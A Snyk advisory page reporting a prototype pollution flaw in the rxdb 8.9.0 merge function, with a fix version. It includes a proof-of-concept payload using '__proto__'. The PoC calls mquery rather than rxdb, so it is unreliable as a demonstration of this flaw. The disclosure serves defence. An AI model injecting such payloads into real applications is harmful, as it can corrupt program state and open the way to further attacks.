Homepage
About Snyk

rxdb@8.9.0 vulnerabilities

A local-first realtime NoSQL Database for JavaScript applications - https://rxdb.info/

Go back to all versions of this package
Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the rxdb package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Prototype Pollution

rxdb is a RxDB (short for Reactive Database) is a NoSQL-database for JavaScript Applications like Websites, hybrid Apps, Electron-Apps, Progressive Web Apps and NodeJs.

Affected versions of this package are vulnerable to Prototype Pollution via the merge function within lib/utils.js. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.

PoC

   require('./env').getCollection(function(err, collection) {
      assert.ifError(err);
      col = collection;
      done();
    });
    var payload = JSON.parse('{"__proto__": {"polluted": "vulnerable"}}');
    var m = mquery(payload);
    console.log({}.polluted);
// The empty object {} will have a property called polluted which will print vulnerable

How to fix Prototype Pollution?

Upgrade rxdb to version 9.11.0 or higher.

<9.11.0
Go back to all versions of this package